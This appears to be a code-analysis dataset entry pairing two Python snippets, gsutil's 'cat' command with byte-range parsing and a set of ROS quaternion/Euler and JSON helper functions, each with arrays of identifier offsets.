start-end (e.g., -r 256-5939)
start- (e.g., -r 256-)
-numbytes (e.g., -r -5)
where offsets start at 0, start-end means to return bytes start
through end (inclusive), start- means to return bytes start
through the end of the object, and -numbytes means to return the
last numbytes of the object. For example:
gsutil cat -r 256-939 gs://bucket/object
returns bytes 256 through 939, while:
gsutil cat -r -5 gs://bucket/object
returns the final 5 bytes of the object.
""")
class CatCommand(Command):
"""Implementation of gsutil cat command."""
# Command specification. See base class for documentation.
command_spec = Command.CreateCommandSpec(
'cat',
command_name_aliases=[],
usage_synopsis=_SYNOPSIS,
min_args=1,
max_args=NO_MAX,
supported_sub_args='hr:',
file_url_ok=False,
provider_url_ok=False,
urls_start_arg=0,
gs_api_support=[ApiSelector.XML, ApiSelector.JSON],
gs_default_api=ApiSelector.JSON,
argparse_arguments=[
CommandArgument.MakeZeroOrMoreCloudURLsArgument()
]
)
# Help specification. See help_provider.py for documentation.
help_spec = Command.HelpSpec(
help_name='cat',
help_name_aliases=[],
help_type='command_help',
help_one_line_summary='Concatenate object content to stdout',
help_text=_DETAILED_HELP_TEXT,
subcommand_help_text={},
)
# Command entry point.
def RunCommand(self):
"""Command entry point for the cat command."""
show_header = False
request_range = None
start_byte = 0
end_byte = None
if self.sub_opts:
for o, a in self.sub_opts:
if o == '-h':
show_header = True
elif o == '-r':
request_range = a.strip()
range_matcher = re.compile(
'^(?P<start>[0-9]+)-(?P<end>[0-9]*)$|^(?P<endslice>-[0-9]+)$')
range_match = range_matcher.match(request_range)
if not range_match:
raise CommandException('Invalid range (%s)' % request_range)
if range_match.group('start'):
start_byte = long(range_match.group('start'))
if range_match.group('end'):
end_byte = long(range_match.group('end'))
if range_match.group('endslice'):
start_byte = long(range_match.group('endslice'))
else:
self.RaiseInvalidArgumentException()
return CatHelper(self).CatUrlStrings(self.args,
show_header=show_header,
start_byte=start_byte,
end_byte=end_byte)
| [
[
[
758,
773
]
],
[
[
782,
784
],
[
4038,
4040
]
],
[
[
815,
824
],
[
4659,
4668
]
],
[
[
851,
858
],
[
2753,
2760
],
[
2888,
2895
],
[
3416,
3423
]
],
[
[
894,
909
],
[
3276,
3291
]
],
[
[
939,
950
],
[
3164,
3175
],
[
3181,
3192
],
[
3221,
3232
]
],
[
[
979,
995
],
[
4234,
4250
]
],
[
[
1019,
1025
],
[
3024,
3030
]
],
[
[
1027,
1036
],
[
1122,
1131
],
[
2980,
2989
]
],
[
[
1073,
1092
],
[
3601,
3620
]
],
[
[
2742,
2752
]
]
] |
from math import sqrt
from math import pi
import json
import tf
from geometry_msgs.msg import Quaternion
def dynamic_euclid_dist(a, b):
o = 0
for i in range(len(a)):
o += (a[i]-b[i])**2
return sqrt(o)
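# Illustrative (not from the original source):
#   dynamic_euclid_dist((0, 0), (3, 4)) -> 5.0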
def quaternion_from_euler(roll, pitch, yaw):
'''
From HSR's utils.py
'''
q = tf.transformations.quaternion_from_euler(roll / 180.0 * pi,
pitch / 180.0 * pi,
yaw / 180.0 * pi, 'rxyz')
return Quaternion(q[0], q[1], q[2], q[3])
def euler_from_quaternion(q):
q = tf.transformations.euler_from_quaternion([q.x, q.y, q.z, q.w], 'rxyz')
return (q[0]/pi * 180, q[1]/pi * 180, q[2]/pi * 180)
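# Illustrative round trip (not from the original source): with the 'rxyz'
# convention used above, euler_from_quaternion(quaternion_from_euler(0, 0, 90))
# is approximately (0.0, 0.0, 90.0).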
def str_to_obj(string):
"""
Converts JSON string to data structure
Args:
string (str): valid JSON string
Raises:
        ValueError: if input isn't a valid JSON string
Returns:
Data structure: [description]
"""
try:
return json.loads(string)
except ValueError as e:
        raise ValueError("ValueError occurred when loading JSON string: {}, the input was: {}".format(e, string))
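# Illustrative (not from the original source): str_to_obj('{"a": 1}') -> {'a': 1}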
def obj_to_str(obj):
return json.dumps(obj) | [
[
[
17,
21
],
[
214,
218
]
],
[
[
39,
41
],
[
372,
374
],
[
441,
443
],
[
508,
510
],
[
698,
700
],
[
713,
715
],
[
728,
730
]
],
[
[
49,
53
],
[
1017,
1021
],
[
1214,
1218
]
],
[
[
61,
63
],
[
316,
318
],
[
610,
612
]
],
[
[
94,
104
],
[
536,
546
]
],
[
[
110,
129
]
],
[
[
227,
248
]
],
[
[
576,
597
]
],
[
[
743,
753
]
],
[
[
1186,
1196
]
]
] |